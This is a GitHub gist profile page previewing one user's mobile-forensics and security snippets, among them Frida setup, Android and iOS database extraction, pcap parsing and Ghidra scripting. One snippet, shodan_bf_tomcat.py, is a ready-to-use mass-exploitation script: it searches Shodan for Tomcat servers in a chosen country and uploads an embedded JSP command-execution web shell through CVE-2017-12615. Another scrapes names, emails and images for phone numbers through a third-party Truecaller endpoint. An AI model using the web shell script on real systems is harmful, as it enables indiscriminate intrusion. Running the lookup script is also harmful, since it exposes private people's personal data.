Skip to content

Instantly share code, notes, and snippets.

View iddoeldor's full-sized avatar

iddoeldor

View GitHub Profile
@iddoeldor
iddoeldor / frida_server_install.sh
Last active April 14, 2024 15:23
one liner to download, push & run the latest frida server
OS='android';PARCH=`adb shell getprop ro.product.cpu.abi`;\
curl -s https://api.github.com/repos/frida/frida/releases \
| jq '.[0] | .assets[] | select(.browser_download_url | match("server(.*?)'${OS}'-'${PARCH}'*\\.xz")).browser_download_url' \
| xargs wget -q --show-progress $1 \
&& unxz frida-server* \
&& adb root \
&& adb push frida-server* /data/local/tmp/ \
&& adb shell "chmod 755 /data/local/tmp/frida-server" \
&& adb shell "/data/local/tmp/frida-server &"
@iddoeldor
iddoeldor / shodan_bf_tomcat.py
Created January 5, 2018 19:45
Iterating Shodan results for Tomcat servers, sending HTTP PUT requests to upload JSP shell ( CVE-2017-12615 )
import shodan
import requests
SHODAN_API_KEY = ""
COUNTRY = "IL"
JSP_SHELL = '<%@ pageimport=”java.util.*,java.io.*”%><%%><HTML><BODY><H3>JSP SHELL</H3><FORM METHOD=”GET” NAME=”myform”ACTION=”"><INPUT TYPE=”text” NAME=”cmd”><INPUT TYPE=”submit” VALUE=”Execute”></FORM><PRE><%if (request.getParameter(“cmd”) !=null){out.println(“Command: ” +request.getParameter(“cmd”) + “<BR>”);Process p=Runtime.getRuntime().exec(request.getParameter(“cmd”));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while ( disr !=null ){out.println(disr);disr=dis.readLine();}}%></PRE></BODY></HTML>'
TEST_PAYLOAD = '<% out.write("<html><body>test</body></html>"); %>'
URL_PREFIX = 'http://'
SUFFIX_PORT = ':8080/'
@iddoeldor
iddoeldor / adb_db_print.py
Last active September 9, 2023 18:00
extract & print database content from android
import os
import sys
import subprocess
import sqlite3
import pandas as pd
arg_folder = sys.argv[1] # root folder to recursively search db files from
output_lines = subprocess.check_output(['adb', 'shell', ('ls -R %s' % arg_folder)]).decode('utf-8').splitlines()
db_files = []
current_folder = ''
@iddoeldor
iddoeldor / true_caller.py
Created November 16, 2017 06:41
extract name, email & image from true caller
import requests
from bs4 import BeautifulSoup
api_url = 'https://xtremetricks.net/truecaller/truecall.php'
phone_number = '+972500000001'
res = {'number': phone_number}
req = requests.post(api_url, data={'number': phone_number})
@iddoeldor
iddoeldor / ios_ssh_over_usb_and_ipa_extractor.md
Last active October 16, 2022 05:01
and iOS related tips&tricks

extract db

PASS=alpine; PORT=2222; sshpass -p $PASS ssh -p $PORT root@localhost -t "cp \$(find /var/mobile/Containers/Data/Application/ -name s4l*db) /private/var/tmp/skype.db" && sshpass -p $PASS scp -P $PORT root@localhost:/private/var/tmp/skype.db .

pull & read plist

/tmp$ scp -P 2222 root@localhost:/private/var/mobile/Containers/Data/Application/F8C7294C-2B60-48EC-A987-D46B9FE4DEAE/Library/Preferences/com.skype.skype.plist .
/tmp$ sudo apt-get install libplist-utils
/tmp$ plistutil -i com.skype.skype.plist | less
@iddoeldor
iddoeldor / solve.py
Created June 30, 2019 10:26 — forked from inaz2/solve.py
angr example of input handling
$ gcc test.c
$ python solve.py
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior.
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 1) setting a value to the initial state
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY_REGISTERS}, to suppress these messages.
WARNING | 2019-05-06 19:54:00,018 | angr.state_plugins.symbolic_memory | Filling register r15 with 8 unconstrained bytes referenced from 0x810 (__libc_csu_
@iddoeldor
iddoeldor / UiccUnlock.cpp
Last active November 21, 2021 20:05 — forked from tewilove/UiccUnlock.cpp
Looks like a quasi-exploit to do a SIM unlock
#include <android/log.h>
#include <jni.h>
#include <binder/Binder.h>
#include <binder/Parcel.h>
#include <binder/IServiceManager.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
@iddoeldor
iddoeldor / make_an_android_app_debugabble_and_reinstall.sh
Created June 8, 2018 13:10
Make an android app debugabble and reinstall
#!/bin/sh
# Make an android app debugabble and reinstall
set -ex
DNAME="CN=Ross Patterson, OU=me, O=rpatterson.net, L=San Francisco, ST=CA, C=US"
PACKAGE_RE='^package:(/data/app/([^-]+)-.+==/(.+.apk))=.+'
MANIFEST_RE='(<application [^>]+)>'
export PATH=$HOME/Android/Sdk/platform-tools:$PATH
@iddoeldor
iddoeldor / read_pcap_data.py
Created June 6, 2018 21:20
iterate over pcap, base64 decode packet data w/ python
import json
from pprint import pprint
from scapy.all import *
packets = rdpcap('sniff.cap')
# Let's iterate through every packet
c = 1
arr = []
for packet in packets:
@iddoeldor
iddoeldor / get_classes.py
Created January 9, 2021 16:58 — forked from SamL98/get_classes.py
from ghidra.program.model.address import Address
from ghidra.program.model.mem import MemoryAccessException
from ghidra.program.flatapi import FlatProgramAPI
from ghidra.util.task import TaskMonitor
import math
import json
from os.path import isfile, join, dirname
import struct as st
import string